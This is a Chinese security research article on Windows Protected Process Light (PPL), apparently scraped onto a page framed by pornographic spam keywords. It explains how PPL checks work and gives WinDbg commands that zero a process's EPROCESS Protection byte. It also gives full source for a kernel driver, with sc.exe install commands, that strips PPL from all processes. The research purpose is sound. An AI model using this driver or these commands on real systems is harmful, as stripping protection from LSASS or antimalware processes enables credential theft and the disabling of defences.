日韩天堂,国产精品久久久久久久久久一区,羞羞羞网站,自拍视频网站,久久亚洲欧美成人精品,桃花阁成人网在线观看

Hello! 歡迎來到小浪云!


原創Paper | Windows 的 PPL 安全機制和繞過

作者:0x7F@知道創宇404實驗室日期:2023年5月5日

0x00 前言

參考資料

Windows 從 vista 版本引入一種進程保護機制(Process Protection),用于更進一步的控制進程的訪問級別,在此之前,用戶只需要使用 SeDebugPrivilege 令牌權限即可獲取任意進程的所有訪問權限;隨后 Windows8.1 在此進程保護的基礎上,擴展引入了進程保護光機制(protected Process Light),簡稱 PPL 機制,其能提供更加細粒度化的進程訪問權限控制。

本文將介紹 Windows 的 PPL 安全機制,以及在實驗環境下如何繞過該機制,從而實現對 PPL 的進程進行動態調試。

本文實驗環境:

代碼語言:JavaScript代碼運行次數:0運行復制

Windows 10 專業版 22H2Visual Studio 2019

0x01 PPL機制

參考資料

使用 Process Explorer 工具查看進程列表,我們可以看到 Windows 的部分核心進程設置了 PPL 保護:

原創Paper | Windows 的 PPL 安全機制和繞過

對于安全研究來說,PPL機制最直觀的感受就是即便使用管理員權限也無法 attach 這個進程進行調試:

原創Paper | Windows 的 PPL 安全機制和繞過

通過官網文檔(https://learn.microsoft.com/en-us/windows/win32/procthread/zwqueryinformationprocess)可以了解到 PS_PROTECTION 的結構如下:

代碼語言:javascript代碼運行次數:0運行復制

typedef struct _PS_PROTECTION {    union {        UCHAR Level;        struct {            UCHAR Type   : 3;            UCHAR Audit  : 1;                  // Reserved            UCHAR Signer : 4;        };    };} PS_PROTECTION, *PPS_PROTECTION;

前 3 位包含進程保護的類型:

代碼語言:javascript代碼運行次數:0運行復制

typedef enum _PS_PROTECTED_TYPE {    PsProtectedTypeNone = 0,    PsProtectedTypeProtectedLight = 1,    PsProtectedTypeProtected = 2} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

后 4 位包含進程保護的簽名者標識:

代碼語言:javascript代碼運行次數:0運行復制

typedef enum _PS_PROTECTED_SIGNER {    PsProtectedSignerNone = 0,    PsProtectedSignerAuthenticode,    PsProtectedSignerCodeGen,    PsProtectedSignerAntimalware,    PsProtectedSignerLsa,    PsProtectedSignerWindows,    PsProtectedSignerWinTcb,    PsProtectedSignerWinSystem,    PsProtectedSignerApp,    PsProtectedSignerMax} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

通過 WinDBG 進行本地內核調試,查看上圖進程 smss.exe(412) 的內核對象 EPROCESS 可以查看 PPL=0x61,如下:

原創Paper | Windows 的 PPL 安全機制和繞過

PPL 機制在內核函數 NtOpenProcess 進行實現,當我們訪問進程時最終都會調用該函數;NtOpenProcess 位于 ntoskrnl.exe 內,結合符號表逆向如下:

原創Paper | Windows 的 PPL 安全機制和繞過

經過一系列的調用,最終進入到 PPL 檢查的關鍵邏輯 RtlTestProtectedaccess,其調用如下:

原創Paper | Windows 的 PPL 安全機制和繞過

RtlTestProtectedAccess 的判斷邏輯如下:

原創Paper | Windows 的 PPL 安全機制和繞過

其中 Protection.Signer 經過 RtlProtectedAccess 轉換的權限如下:

代碼語言:javascript代碼運行次數:0運行復制

PsProtectedSignerNone         0 => 0x0PsProtectedSignerAuthenticode 1 => 0x2PsProtectedSignerCodeGen      2 => 0x4PsProtectedSignerAntimalware  3 => 0x108PsProtectedSignerLsa          4 => 0x110PsProtectedSignerWindows      5 => 0x13ePsProtectedSignerWinTcb       6 => 0x17ePsProtectedSignerWinSystem    7 => 0x1fePsProtectedSignerApp          8 => 0x0

0x02 雙機調試bypass

參考資料

使用雙機內核調試可以無視大多數的安全機制,這里我使用網絡雙機調試,成功連接被調試主機后,再進入到有 PPL 機制的 smss.exe(412) 的進程空間下,直接就可以正常調試:

原創Paper | Windows 的 PPL 安全機制和繞過

但是實際場景下雙機調試可能受環境限制,同時雙機調試也不如用戶模式下方便,下面我們看看通過本地調試的方法來繞過 PPL 機制。

0x03 本地調試bypass

參考資料

通過上文對 PPL 機制的介紹,我們知道 PPL 的標識位是以 _PS_PROTECTION 結構存放于 EPROCESS 進程對象中,雖然本地內核調試無法控制程序執行流,但可以修改內存值;那么我們可以先通過本地內核調試去除 PPL 標識,隨后便可以在用戶模式下調試目標進程。

配置好本地內核調試環境后,使用管理員權限啟動 WinDBG,覆寫 smss.exe(412) 進程的 Protection = 0x00 命令如下:

代碼語言:javascript代碼運行次數:0運行復制

# 獲取 smss.exe 進程的 EPROCESS 地址lkd > !process 0 0 smss.exe# 從 EPROCESS 獲取 Protection 的偏移和值lkd > dt nt!_eprocess ffffc40b2c45e080 Protectionlkd > db ffffc40b2c45e080+0x87a l1# 將 Protection 值修改為 0x00lkd > eb ffffc40b2c45e080+0x87a 0x00

執行如下:

原創Paper | Windows 的 PPL 安全機制和繞過

隨后我們再以管理員權限啟動 WinDBG,attach 到目標進程上,可以成功進行調試:

原創Paper | Windows 的 PPL 安全機制和繞過

0x04 工具

參考資料

根據本地內核調試去除 PPL 標識的思路,我們可以編寫驅動程序如下,使用 ZwQuerySystemInformation() 遍歷進程,使用 PsLookupProcessByProcessId() 獲取進程的 EPROCESS,隨后按 Protection 的偏移將其內存值覆寫為 0x00:

代碼語言:javascript代碼運行次數:0運行復制

#include <ntifs.h>#include <wdf.h>#define EPROCESS_PROTECTION_OFFSET 0x87A        // windows10 professional 22H2DRIVER_INITIALIZE DriverEntry;typedef enum _SYSTEM_INFORMATION_CLASS {    SystemProcessInformation = 5,    // ...} SYSTEM_INFORMATION_CLASS;typedef struct _SYSTEM_PROCESS_INFORMATION {    ULONG NextEntryOffset;    ULONG NumberOfThreads;    BYTE Reserved1[48];    PVOID Reserved2[3];    HANDLE UniqueProcessId;    PVOID Reserved3;    ULONG HandleCount;    BYTE Reserved4[4];    PVOID Reserved5[11];    SIZE_T PeakPagefileUsage;    SIZE_T PrivatePageCount;    LARGE_INTEGER Reserved6[6];} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;NTSTATUS NTAPI ZwQuerySystemInformation(    _In_      SYSTEM_INFORMATION_CLASS SystemInformationClass,    _Inout_   PVOID                    SystemInformation,    _In_      ULONG                    SystemInformationLength,    _Out_opt_ PULONG                   ReturnLength);NTKERNELAPI UCHAR* PsGetProcessImageFileName(__in PEPROCESS Process);VOID OnUnload(_In_ PDRIVER_OBJECT DriverObject){    UNREFERENCED_PARAMETER(DriverObject);    KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: unload drivern"));}NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath) {    ULONG BufferSize = 0;    NTSTATUS Status = STATUS_SUCCESS;    PVOID Buffer = NULL;    PSYSTEM_PROCESS_INFORMATION pInfo = NULL;    UNREFERENCED_PARAMETER(DriverObject);    UNREFERENCED_PARAMETER(RegistryPath);    KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: driver entryn"));    // register unload function    DriverObject->DriverUnload = OnUnload;    // get size of SYSTEM_PROCESS_INFORMATION    Status = ZwQuerySystemInformation(SystemProcessInformation, NULL, 0, &BufferSize);    if (Status != STATUS_INFO_LENGTH_MISMATCH) {        KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: ZwQuerySystemInformation get size failed status=0x%xn", Status));        goto _LABEL_EXIT;    }    // alloc memory and get SYSTEM_PROCESS_INFORMATION    Buffer = ExAllocatePoolWithTag(PagedPool, BufferSize, '1gaT');    if (Buffer == NULL) {        KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: ExAllocatePoolWithTag failedn"));        goto _LABEL_EXIT;    }    Status = ZwQuerySystemInformation(SystemProcessInformation, Buffer, BufferSize, &BufferSize);    if (Status != STATUS_SUCCESS) {        KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: ZwQuerySystemInformation get info failed status=0x%xn", Status));        goto _LABEL_EXIT;    }    // traverse all processes and rewrite "Protection" to 0x00    pInfo = (PSYSTEM_PROCESS_INFORMATION)Buffer;    do {        PEPROCESS Process = NULL;        Status = PsLookupProcessByProcessId(pInfo->UniqueProcessId, &Process);        if (NT_SUCCESS(Status)) {            BYTE* Protection = (BYTE*)Process + EPROCESS_PROTECTION_OFFSET;            if (*Protection != 0) {                KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: rewrite %s[%d] Protection=0x%x to 0x00n",                    PsGetProcessImageFileName(Process), pInfo->UniqueProcessId, *Protection));                *Protection = 0x00;            }        }        else {            KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: PsLookupProcessByProcessId [%d] failed status=0x%xn",                pInfo->UniqueProcessId, Status));        }        pInfo = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pInfo + pInfo->NextEntryOffset);    } while (pInfo->NextEntryOffset);_LABEL_EXIT:    if (Buffer != NULL) {        ExFreePoolWithTag(Buffer, '1gaT');    }    return STATUS_SUCCESS;}

成功編譯后,將驅動程序注冊為服務來啟動運行(需設置主機為測試模式):

代碼語言:javascript代碼運行次數:0運行復制

# 注冊驅動程序為服務sc.exe create remove_ppl type= kernel start= demand binPath= [src]remove_ppl.sys# 查看服務信息sc.exe queryex remove_ppl# 啟動驅動程序/服務sc.exe start remove_ppl

運行驅動程序,并使用 Process Explorer 查看,所有進程的 PPL 標識都被去除了:

原創Paper | Windows 的 PPL 安全機制和繞過

除了以上實驗代碼外,也可以參考更加完善的 PPL 控制工具

https://github.com/Mattiwatti/PPLKillerhttps://github.com/itm4n/PPLcontrol

0x05 References

參考資料

https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-https://learn.microsoft.com/en-us/windows/win32/procthread/zwqueryinformationprocesshttps://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rightshttps://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/process_vista.dochttps://www.crowdstrike.com/blog/evolution-protected-processes-part-1-pass-hash-mitigations-windows-81/https://www.crowdstrike.com/blog/evolution-protected-processes-part-2-exploitjailbreak-mitigations-unkillable-processes-and/https://www.cnblogs.com/H4ck3R-XiX/p/15872255.htmlhttps://www.cnblogs.com/revercc/p/16961961.htmlhttps://itm4n.github.io/debugging-protected-processes/https://paper.seebug.org/1892/https://github.com/Mattiwatti/PPLKillerhttps://github.com/itm4n/PPLcontrol

access ai git github https JavaScript microsoft protected typedef Windows 對象 工具

相關閱讀

主站蜘蛛池模板: 亚洲国产精品一区二区久 | 亚洲图片在线播放 | 欧美日韩在线免费看 | 国产福利啪啪 | 国产精品久久亚洲一区二区 | www.五月 | 亚洲国产成人精品一区二区三区 | 国内精品久久久久影院6 | 亚洲福利视频导航 | 亚洲精品第1页 | 欧美精品福利视频 | 国产小视频在线高清播放 | 激情五月社区 | 亚洲丁香婷婷综合久久小说 | 一区二区三区免费精品视频 | 日韩在线精品 | 自拍偷拍五月天 | 丁香婷婷网 | 国产一区高清 | 亚洲高清一区二区三区四区 | 羞羞视频网站在线观看 | 国产一区二区三区久久精品 | 激情五月婷婷丁香 | 第一区免费在线观看 | 国产日本欧美在线观看乱码 | 在线一区二区三区 | 日韩综合 | 亚洲美女视频 | 羞羞色在线观看 | 亚洲国产欧美日韩精品一区二区三区 | 婷婷欧美综合五月六月缴情 | 伊人情人综合网 | 婷婷四房综合激情五月在线 | 国产色片在线观看 | 禁网站在线观看免费视频 | 中文字幕欧美日韩 | 久久精品国产亚洲a不卡 | 丁香六月在线视频 | 国产精品一区二区三区久久 | 午夜精品福利在线观看 | 国产免费自拍 |